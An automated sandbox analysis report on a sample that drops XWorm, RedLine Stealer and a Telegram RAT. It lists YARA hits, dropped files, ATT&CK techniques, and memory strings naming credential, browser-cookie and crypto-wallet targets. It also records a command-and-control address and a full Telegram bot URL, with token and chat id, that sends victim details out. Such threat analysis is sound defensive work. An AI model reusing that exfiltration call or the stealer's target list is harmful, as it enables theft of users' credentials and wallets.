Source: Yara match	File source: Process Memory Space: Output.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\build.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 2.0.XClient.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.XClient.exe.12971a78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.XClient.exe.12971a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mstc.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\XClient.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 2.0.XClient.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.XClient.exe.12971a78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.XClient.exe.12971a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2585450577.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2585450577.0000000002961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2585450577.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2585450577.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mstc.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\XClient.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: powershell.exe, 00000005.00000002.1410582309.000001CD41E44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Source: Yara match	File source: 3.0.build.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12459750.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12459750.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12441908.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12441908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Output.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\build.exe, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 3.0.build.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12459750.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12459750.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12441908.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Output.exe.12441908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Output.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: build.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\build.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 2.0.XClient.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.XClient.exe.12971a78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.XClient.exe.12971a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mstc.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\XClient.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 2.0.XClient.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.XClient.exe.12971a78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.XClient.exe.12971a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2585450577.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2585450577.0000000002961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2585450577.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2585450577.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mstc.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\XClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	21 Obfuscated Files or Information	Security Account Manager	541 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Registry Run Keys / Startup Folder	22 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	151 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Output.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.AsyncRAT
Output.exe	58%	Virustotal		Browse
Output.exe	100%	Avira	TR/Dropper.Gen
Output.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\mstc.exe	100%	Avira	TR/Spy.Gen
C:\ProgramData\XClient.exe	100%	Avira	TR/Spy.Gen
C:\ProgramData\build.exe	100%	Avira	TR/RedLine.AJ
C:\Users\user\AppData\Local\Temp\mstc.exe	100%	Joe Sandbox ML
C:\ProgramData\XClient.exe	100%	Joe Sandbox ML
C:\ProgramData\build.exe	100%	Joe Sandbox ML
C:\ProgramData\XClient.exe	69%	Virustotal		Browse
C:\ProgramData\build.exe	96%	ReversingLabs	ByteCode-MSIL.Infostealer.RedLine
C:\ProgramData\build.exe	79%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\mstc.exe	69%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
https://api.ipify.orgcookies//settinString.Removeg	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectLR	0%	Avira URL Cloud	safe
http://91.92.252.220:9078	0%	Avira URL Cloud	safe
http://www.micom/pkiops/Docs/ry.htm0	0%	Avira URL Cloud	safe
http://91.92.252.220:9078/	0%	Avira URL Cloud	safe
http://osoft.co	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectLR	2%	Virustotal		Browse
http://tempuri.org/	0%	Avira URL Cloud	safe
http://www.microsoft.co	1%	Virustotal		Browse
http://tempuri.org/Endpoint/CheckConnect	0%	Avira URL Cloud	safe
http://tempuri.org/	2%	Virustotal		Browse
http://91.92.252.220:9078/	10%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettingsLR	0%	Avira URL Cloud	safe
http://91.92.252.220:9078	10%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
91.92.252.220:9078	0%	Avira URL Cloud	safe
http://osoft.co	0%	Virustotal		Browse
http://tempuri.org/Endpoint/CheckConnect	2%	Virustotal		Browse
91.92.252.220	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/SetEnvironmentLR	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdatesLR	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsLR	2%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdateLR	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	1%	Virustotal		Browse
91.92.252.220	12%	Virustotal		Browse
http://tempuri.org/Endpoint/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdatesLR	2%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/CheckConnectT	0%	Avira URL Cloud	safe
http://tempuri.org/0	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/	1%	Virustotal		Browse
127.0.0.1	0%	Avira URL Cloud	safe
91.92.252.220:9078	10%	Virustotal		Browse
http://tempuri.org/Endpoint/CheckConnectT	2%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdateLR	2%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	1%	Virustotal		Browse
http://tempuri.org/0	0%	Virustotal		Browse
http://tempuri.org/Endpoint/SetEnvironmentLR	2%	Virustotal		Browse
127.0.0.1	2%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdatesResponse	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.3%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A09B6D1F69BB0E33E6F7A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203TYHZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.3	false		high
91.92.252.220:9078	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
91.92.252.220	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
127.0.0.1	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, build.exe.1.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.1410582309.000001CD41E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1540160968.00000242DF871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1728788196.000001369E490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectLR	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.92.252.220:9078	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000272F000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.telegram.org/bot	XClient.exe, 00000002.00000002.2585450577.00000000029AA000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000002.00000000.1318433456.00000000007B2000.00000002.00000001.01000000.00000006.sdmp, XClient.exe, 00000002.00000002.2607955119.0000000012961000.00000004.00000800.00020000.00000000.sdmp, mstc.exe.2.dr, XClient.exe.1.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.1391396246.000001CD31FF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1449141258.00000242CFA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1592886665.000001368E649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.micom/pkiops/Docs/ry.htm0	powershell.exe, 00000008.00000002.1558493573.00000242E7F50000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, build.exe.1.dr	false	URL Reputation: safe	unknown
http://www.microsoft.co	powershell.exe, 0000000D.00000002.1756272246.00000136A6AA0000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000273C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000F.00000002.2029145272.00000177DD2BF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://osoft.co	powershell.exe, 00000005.00000002.1390192954.000001CD3041A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.92.252.220:9078/	build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000273C000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	build.exe, 00000003.00000002.2586614803.000000000272F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.000000000273C000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsLR	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000002.1804184140.00000177CD479000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m	XClient.exe, 00000002.00000002.2632132964.000000001C576000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1759694372.00000136A6C58000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentLR	build.exe, 00000003.00000002.2586614803.000000000285A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002770000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ipify.orgcookies//settinString.Removeg	Output.exe, 00000001.00000002.1319960646.0000000012428000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000003.00000000.1318795550.0000000000342000.00000002.00000001.01000000.00000007.sdmp, build.exe.1.dr	true	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	build.exe, 00000003.00000002.2586614803.0000000002691000.00000004.00000800.00020000.00000000.sdmp	false		high
